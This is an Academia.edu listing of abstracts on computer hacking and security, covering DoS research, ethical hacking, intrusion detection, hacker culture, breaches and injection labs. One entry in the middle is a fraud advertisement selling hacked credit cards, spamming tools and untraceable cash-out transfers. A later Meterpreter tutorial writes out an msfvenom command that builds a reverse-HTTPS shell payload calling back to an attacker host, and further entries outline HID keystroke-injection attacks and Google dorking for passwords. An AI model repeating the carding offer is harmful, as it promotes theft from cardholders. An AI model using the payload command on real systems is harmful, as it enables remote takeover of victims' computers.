Computer Hacking Research Papers - Academia.edu (original) (raw)

One of the key issues that need to be addressed in wireless sensor network field is how to create a most efficient energy system. Ad-hoc Networks are becoming an effective tool for many mission critical applications such as troop... more

One of the key issues that need to be addressed in wireless sensor network field is how to create a most efficient energy system. Ad-hoc Networks are becoming an effective tool for many mission critical applications such as troop coordination, situational awareness Etc. Ad-hoc Networks having limited computation and communication resources. To unguaranteed connectivity to trust authorities make known solutions for trusted authorities make knows solutions for single hop wireless networks. In this Project I am presenting A Distinct Authentication Key for New TAM Protocol For large scale dense ad-hoc networks. TAM exploits network clusters to reduce overhead and ensure scalability. Multicast traffic with in a cluster employs a “One way hash function” chain in order to authenticate the message source. Cross cluster multicast traffic includes Message Authentication Codes (MAC’s) that are based on a set of keys. Result in terms of bandwidth overhead and delivery delay

To protect computer systems it is important to consider the concept of CIA: confidentiality, integrity and availability. With respect to availability, hackers continue to focus on preventing access to online services and systems by... more

To protect computer systems it is important to consider the concept of CIA: confidentiality, integrity and availability. With respect to availability, hackers continue to focus on preventing access to online services and systems by crashing a service through exploitation or by flooding services to the point that the resource is no longer accessible. These types of denial-of-service or DoS attacks can come directly from one IP address or from a multitude of computers located in disparate locations, known as distributed denial-of-service (DDoS) attacks. A variety of academic viewpoints have been created that focus on the detection, prevention, and mitigation of DoS attacks. Some academic research shows potential for real-world application, while others merely advance theoretical viewpoints that cannot realistically be implemented in the current technological landscape. In this essay, three research papers are reviewed, and each paper focuses on a novel approach to detect, prevent or mitigate availability attacks through DoS. The resulting analysis provides perspective on the feasibility of each approach.

I have objectives from my good work done, i hack and spam which is the sole reason i can guarantee remmiting valid Cc's,valid spamming tools, running multiple transfers. As you all knows i work from anonymous off shore server, I have... more

I have objectives from my good work done, i hack and spam which is the sole reason i can guarantee remmiting valid Cc's,valid spamming tools, running multiple transfers. As you all knows i work from anonymous off shore server, I have secured a well balance account which is ACH enable capable of remitting variety of transfer credential via Instant Bank transfer/drop, Western union transfer, Bitcoin transfer, PayPal transfer, Skrill transfer and more at high balance rates. I work with legit affiliates authorizing this possible transfer since all protocols and measures are duly observe cashing out with zero theft and no traces of future charge back fee with out stipulation as all required charges is subjected to provide due success working with our fidelity.

Le mode d'apprentissage CEH eLEARNING respecte scrupuleusement la totalité du cursus de formation officiel EC-Council. Le cursus eLEARNING aborde de manière successive chaque module tel le cours présentiel BOOTCAMP avec des exercices, des... more

Le mode d'apprentissage CEH eLEARNING respecte scrupuleusement la totalité du cursus de formation officiel EC-Council. Le cursus eLEARNING aborde de manière successive chaque module tel le cours présentiel BOOTCAMP avec des exercices, des démonstrations et simulations complémentaires qui vous permettent d'approfondir les connaissances et de maximiser les chances de réussite aux examens de certification.

faster searching and network scanning with nmap

During the early and mid-1980s, a home computing practice of use and openness of software emerged in Greece. This computer culture both reflected and reinforced the local economic and technological characteristics. Because the protection... more

During the early and mid-1980s, a home computing practice of use and openness of software emerged in Greece. This computer culture both reflected and reinforced the local economic and technological characteristics. Because the protection of intellectual property rights regarding software was not an issue, software piracy was not considered such a pressing problem as it would become later. Home computing in Greece was shaped by two technology-mediating actors, who actively guided and manipulated the technology and its use: the computer magazine Pixel and small computer stores. The author argues that these technology mediators supported a conception of software as something that could and should be adjusted to the needs of local users through the – legitimate – altering of the software code. The chapter discusses the so-called “cassette piracy” phenomenon during the period together with the interaction between home computer users and the development of
computing technology.

Being one of the largest online dating sites for over than ten years, Ashley Madison, run by Canadian company Avid Life Media (ALM), is known to have made $115 million net in 2014 and was planning to move toward an Initial Public Offering... more

Being one of the largest online dating sites for over than ten years, Ashley Madison, run by Canadian company Avid Life Media (ALM), is known to have made $115 million net in 2014 and was planning to move toward an Initial Public Offering by the end of 2015 if and only if the ALM has not been hacked by a group called the Impact Team. The Ashley Madison Hack is already accepted as a high-profile data breach that took place in 2015 so far, it also turned out to have a bigger influence on the ALM and ‘supposedly’ anonymous users.

The state of security on the internet is bad and getting worse. One reaction to this state of affairs is termed as Ethical Hacking which attempts to increase security protection by identifying and patching known security vulnerabilities... more

The state of security on the internet is bad and getting worse. One reaction to this state of affairs is termed as Ethical Hacking which attempts to increase security protection by identifying and patching known security vulnerabilities on systems owned by other parties. As public and private organizations migrate more of their critical functions to the Internet, criminals have more opportunity and incentive to gain access to sensitive information through the Web application. Thus the need of protecting the systems from the nuisance of hacking generated by the hackers is to promote the persons who will punch back the illegal attacks on our computer systems. So, Ethical hacking is an assessment to test and check an information technology environment for possible weak links and vulnerabilities. Ethical hacking describes the process of hacking a network in an ethical way, therefore with good intentions. This paper describes what ethical hacking is, what it can do, an ethical hacking me...

Research concerning computer hackers generally focuses on how to stop them; far less attention is given to the texts they create. Phrack, an online hacker journal that has run almost continuously since 1985, is an important touchstone in... more

Research concerning computer hackers generally focuses on how to stop them; far less attention is given to the texts they create. Phrack, an online hacker journal that has run almost continuously since 1985, is an important touchstone in hacker literature, widely read by both hackers and telephone and network security professionals. But beyond its instantiation as a compendium of illicit technical knowledge, Phrack was, above all, a rhetorical publication. The files in each issue of Phrack created a shared rhetorical vision concerning the place of the hacker underground within society and in relation to law enforcement officials, as well as what it means to be a hacker. This essay examines two important events in the evolution of the hacker movement through the lens of Phrack—Operation Sundevil and the arrest of Kevin Mitnick. How these events were framed in Phrack both shaped and reflected emerging shifts in hacker collective identity.

RSegurança da informação constitui um tema de crescente relevância na sociedade informatizada. Conforme a humanidade vem se tornando dependente de bancos de dados, tanto na esfera pública, quanto nas empresas e serviços privados,... more

RSegurança da informação constitui um tema de crescente relevância na sociedade informatizada. Conforme a humanidade vem se tornando dependente de bancos de dados, tanto na esfera pública, quanto nas empresas e serviços privados, salvaguardar a informação se torna uma prioridade. O presente capítulo analisará a segurança da informação, as principais ameaças à integridade dos dados e técnicas de segurança. Os métodos utilizados para tanto são o dedutivo e monográfico e a técnica de pesquisa é a bibliográfica.

Introduction to Paytm
Computer forensics
Paytm frauds
How it works
Security measures
Preventive measures

Excellent book to understand the fundamentals of windos and its weak points for penetration testing.

In the cyber world more and more cyber-attacks are being perpetrated. Hackers have now become the warriors of the internet. They attack and do harmful things to compromised system. This paper will show the methodology use by hackers to... more

In the cyber world more and more cyber-attacks are being perpetrated. Hackers have now become the warriors of the internet. They attack and do harmful things to compromised system. This paper will show the methodology use by hackers to gained access to system and the different tools used by them and how they are group based on their skills. It will identify exploits that can be used to attack a system and find mitigation to those exploits. In addition, the paper discusses the actual implementation of the hacking phases with the virtual machines use in the process. The virtual machines specification is also listed. it will also provide means and insights on how to protect one system from being compromised.

Google search engine is as much common (and having almost no alternative), as it is unknown at the same time. Its potentials in the so-called sensitive data collection regarding individuals and institutions are underestimated. the... more

Google search engine is as much common (and having almost no alternative), as it is unknown at the same time. Its potentials in the so-called sensitive data collection regarding individuals and institutions are underestimated. the well-constructed query, submitted to the Google, makes it possible to find deleted and archival sites, restore the structure of a webpage or the structure of an intranet, access server configuration parameters, obtain information secured intentionally from unauthorized access (paywall, passwords), obtain user names and passwords, their identification numbers (for example the numbers of payment cards, IDs, etc.) and access device configuration parameters (servers, web cameras, routers and others), to take control of them. such

Primeira parte da comunicação apresentada ao "5.º Congresso de Direito na Lusofonia - Direito e novas tecnologias". Escola de Direito da Universidade do Minho / Centro de Investigação em Justiça e Governação, Braga. Dia 23 de de março de... more

Primeira parte da comunicação apresentada ao "5.º Congresso de Direito na Lusofonia - Direito e novas tecnologias". Escola de Direito da Universidade do Minho / Centro de Investigação em Justiça e Governação, Braga. Dia 23 de de março de 2018.
Esta primeira parte está publicada nas Atas do Congresso (Clara Calheiros 'et al.', Org.), pp. 279-288.

This article is very informational for beginners you'll learn a lot about Meterpreter Paranoid Mode in this article. If I am not wrong I think in 2015, hackers realized that it is possible to steal/hijack someone's meterpreter session by... more

This article is very informational for beginners you'll learn a lot about Meterpreter Paranoid Mode in this article. If I am not wrong I think in 2015, hackers realized that it is possible to steal/hijack someone's meterpreter session by simply playing around with the victim's DNS and launching their own handler to connect. This then led to the development and release of meterpreter paranoid mode. They introduced an API that verified the SHA1 hash of the certificate presented by the MSF (Metasploit Framework) at both ends. In this article, we will see how to use the meterpreter paranoid mode. Please read my other Academia articles about advantages of using Railgun in Metasploit, DuckHunter and HID attacks in Kali NetHunter. We need to generate an SSL certificate and to begin with this; we can generate our own using the following commands: openssl req-new-newkey rsa:4096-days 365-nodes-x509-keyout meterpreter.key-out meterpreter.crt The following screenshot shows the output for the preceding command: We fill in the information such as country code and other information accordingly: cat meterpreter.key meterpreter.crt > meterpreter.pem The previous command basically opens two files before and writes them into a single file. We then use our generated certificate to generate a payload using this: msfvenom-p windows/meterpreter/reverse_winhttps LHOST=IP LPORT=443 HandlerSSLCert=meterpreter.pem StagerVerifySSLCert=true-f exe-o payload.exe The following screenshot shows the output for the preceding command:

In this article you'll learn about what are HID attacks and how to perform them using Kali NetHunter? NetHunter has a feature that allows us to turn our device and OTG cable to behave as a keyboard and hence type any given commands on any... more

In this article you'll learn about what are HID attacks and how to perform them using Kali NetHunter? NetHunter has a feature that allows us to turn our device and OTG cable to behave as a keyboard and hence type any given commands on any connected PC. This allows us to perform HID attacks.

In this article, we will learn different type of HID attack, known as DuckHunter HID. This allows us to convert infamous USB Rubber Ducky scripts into NetHunter HID attacks I found information about these attacks (talking about DuckHunter... more

In this article, we will learn different type of HID attack, known as DuckHunter HID. This allows us to convert infamous USB Rubber Ducky scripts into NetHunter HID attacks I found information about these attacks (talking about DuckHunter HID) on GitHub you can get more information about these attacks from there. Please read my previous article I have already explained what are HID attacks? Now coming to the topic, for performing DuckHunter HID attacks follow given steps: 1. We can perform them by opening the NetHunter app. 2. In the menu, we choose DuckHunter HID attacks. 3. The Convert tab is where we can type or load our scripts for execution:

English: In 2013, twenty-nine-year-old Edward Snowden shocked the world when he broke with the American intelligence establishment and revealed that the United States government was secretly pursuing the means to collect every single... more

This is a case on what happens to companies when they do not take steps to mitigate current and future problems regarding there IT security. This paper that I have written walks one through the steps on what they should consider doing... more

This is a case on what happens to companies when they do not take steps to mitigate current and future problems regarding there IT security. This paper that I have written walks one through the steps on what they should consider doing after an online hacker attack.

Intrusion detection has attracted a considerable interest from researchers and industries. The community, after many years of research, still faces the problem of building reliable and efficient IDS that are capable of handling large... more

Intrusion detection has attracted a considerable interest from researchers and industries. The community, after many years of research, still faces the problem of building reliable and efficient IDS that are capable of handling large quantities of data, with changing patterns in real time situations. The work presented in this manuscript classifies intrusion detection systems (IDS). Moreover, a taxonomy and survey of shallow and deep networks intrusion detection systems is presented based on previous and current works. This taxonomy and survey reviews machine learning techniques and their performance in detecting anomalies. Feature selection which influences the effectiveness of machine learning (ML) IDS is discussed to explain the role of feature selection in the classification and training phase of ML IDS. Finally, a discussion of the false and true positive alarm rates is presented to help researchers model reliable and efficient machine learning based intrusion detection systems.

Questo progetto tratta gli attacchi ad iniezione e, in particolare, approfondisce gli attacchi command injection e SQL injection. La scelta è nata in seguito a considerazioni legate al rischio di sicurezza. Nella prima parte definisco... more

Questo progetto tratta gli attacchi ad iniezione e, in particolare, approfondisce gli attacchi command injection e SQL injection. La scelta è nata in seguito a considerazioni legate al rischio di sicurezza. Nella prima parte definisco che cosa sia il rischio per un sistema informatico e che cosa sia il rischio per un’applicazione web secondo le indicazioni di OWASP, The Open Web Application Security Project. Questa organizzazione no profit pubblica ogni tre anni circa un rapporto sui maggiori rischi di sicurezza per le web application. Dopo aver elencato i 10 peggiori rischi di sicurezza stilati nel rapporto del 2017, ho osservato la costante presenza in prima posizione delle iniezioni come maggiore causa di pericolo per la sfruttabilità e il potenziale danno tecnico ed economico verso la struttura ospitante. Ad accentuare l’attenzione sul problema sono stati anche i dati pubblicati da Imperva relativi alla larga diffusione di queste falle nel web. Le superfici iniettabili sono estese poiché i vettori d’attacco sono molteplici: code injection, CRLF injection, cross-site scripting, email injection, host header injection, LDAP injection, command injection, SQL injection (SQLi), xpath injection. Tra queste differenti forme mi sono concentrato sul command injection e sull’SQL injection, ovvero sui moduli vulnerabili disponibili nella piattaforma formativa di DVWA (Damn Vulnerable Web Application). Nella seconda parte dell’elaborato ho presentato un LAB basato, appunto, su DVWA. In una macchina virtuale ho installato due sistemi operativi distinti, Parrot Security OS e Debian, rappresentanti il primo la macchina Attacker e il secondo la macchina Victim. Su quest’ultima sono stati aggiunti Apache2, MariaDB, phpMyAdmin e DVWA necessari per la fase di white-box testing. Grazie a differenti livelli di sicurezza ho analizzato come proteggersi da attacchi command injection e SQL injection ai danni di una web application.